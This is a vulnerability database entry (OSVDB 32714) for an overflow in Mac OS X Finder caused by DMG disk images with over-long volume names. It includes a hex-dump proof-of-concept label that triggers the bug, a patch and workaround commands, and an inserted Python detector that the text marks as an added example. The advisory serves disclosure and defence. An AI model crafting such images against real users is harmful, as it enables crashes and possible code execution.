32714 : Apple Mac OS X Finder DMG Disk Image Volume Name Memory Corruption
http://osvdb.org/32714

Views This Week: 5
Views All Time: 1201
Added to OSVDB: over 4 years ago
Last Modified: over 3 years ago
Modified (since 2008): 0 times
Percent Complete: 90%

Timeline

Disclosure Date: 2007-01-09
Exploit Publish Date: 2007-01-09

Description

A remote buffer overflow exists in Mac OS X's Finder. Finder fails to properly handle DMG images with volume names of more than 255 bytes, leading to memory corruption. Using a specially crafted DMG disk image, a remote attacker can exploit this vulnerability in order to crash the vulnerable application or possibly execute arbitrary commands with the privileges of the user by serving the malicious file via a web server or convincing the victim to download and mount it.

Classification

Location: Remote / Network Access
Attack Type: Denial of Service, Input Manipulation
Impact: Loss of Integrity, Loss of Availability
Exploit: Exploit Public
Disclosure: OSVDB Verified, Vendor Verified

Technical

Hex dump of an example DMG image volume label that can be used to trigger the issue (by Kevin Finisterre):

0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1 LABL.B......E...
0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
0009c20: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c30: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c40: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c50: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c60: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c70: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c80: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c90: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d00: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d10: 4100 0000 0000 0000 0000 0000 0000 0000 A...............
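A triage check for the over-long volume label described above, written as an added example (not code from OSVDB, Apple or the original researcher). It assumes the record layout visible in the hex dump: a 'LABL' tag, 12 header bytes, a 2-byte big-endian length field, then the label bytes; because the dump's length field is 0x00ff and it carries exactly 255 'A's, the check flags any label at or above 255 bytes rather than only strictly longer ones.

```python
"""Flag LABL volume-label records whose length reaches the 255-byte limit.

Added example; the record layout (tag, 12 header bytes, u16 length, label)
is an assumption read off the hex dump, not a documented DMG structure.
"""
import struct

LABL_TAG = b"LABL"
HEADER_LEN = 12        # assumption: bytes between the tag and the length field
LABEL_LIMIT = 255      # Pascal-string / HFS volume-name maximum


def parse_xxd(dump: str) -> bytes:
    """Rebuild bytes from an xxd-style dump: 'offset: 8 hex groups  ascii'."""
    out = bytearray()
    for line in dump.strip().splitlines():
        groups = line.split(":", 1)[1].split()[:8]   # drop the ASCII column
        out += bytes.fromhex("".join(groups))
    return bytes(out)


def find_labels(blob: bytes):
    """Yield (offset, declared_len, label_bytes) for each LABL record."""
    pos = blob.find(LABL_TAG)
    while pos != -1:
        len_off = pos + len(LABL_TAG) + HEADER_LEN
        if len_off + 2 > len(blob):
            break                      # truncated record, nothing to read
        (declared,) = struct.unpack_from(">H", blob, len_off)
        start = len_off + 2
        end = blob.find(b"\x00", start)
        label = blob[start:end if end != -1 else len(blob)]
        yield pos, declared, label
        pos = blob.find(LABL_TAG, pos + 1)


def check_image(blob: bytes):
    """Return findings as (offset, declared_len, actual_len, suspicious)."""
    findings = []
    for off, declared, label in find_labels(blob):
        suspicious = declared >= LABEL_LIMIT or len(label) >= LABEL_LIMIT
        findings.append((off, declared, len(label), suspicious))
    return findings


# Constructed sample: the first two lines of the dump above, then 'A's padded
# out to the 255 bytes the full dump carries, and a benign 8-byte label.
SAMPLE_DUMP = """\
0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1 LABL.B......E...
0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
"""
OVERLONG = parse_xxd(SAMPLE_DUMP) + b"A" * (255 - 14) + b"\x00"
BENIGN = LABL_TAG + bytes(HEADER_LEN) + struct.pack(">H", 8) + b"Untitled" + b"\x00"
```

Run `check_image` over the raw bytes of a downloaded image to list every LABL record with its declared and actual label length.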

Solution

Download and install Security Update 2007-002, as it has been reported to fix this vulnerability. The flaw can also be mitigated with the following workaround(s):
Do not mount disk images, or simply disable Finder and use Spotlight instead. Finder can be disabled using the following steps:
1) Open Terminal, found in /Applications -> Utilities
2) Once inside Terminal, type:
'sudo mv /System/Library/CoreServices/Finder.app /Applications/'
3) While still in Terminal type:
killall Finder

If Finder has already been put into a denial of service condition, the image can be unmounted with the following command in Terminal:
hdiutil unmount /Volumes/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/

Products

Apple Computer, Inc.
  Mac OS X 10.4.8
  Mac OS X Server 10.4.8

References

24354

Credit

  • Kevin Finisterre - kf_listsdigitalmunition.com - Digital Munition

CVSSv2 Score

CVSSv2 Base Score = 6.8
Source: nvd.nist.gov | Generated: 2007-01-11

CVSSv2 Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P (reconstructed from the component indicators; consistent with the 6.8 base score)


The database information may change without any notice. Use of the information constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the copyright holder or distributor (OSVDB or OSF) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

© Copyright 2012 Open Source Vulnerability Database (OSVDB), All Rights Reserved.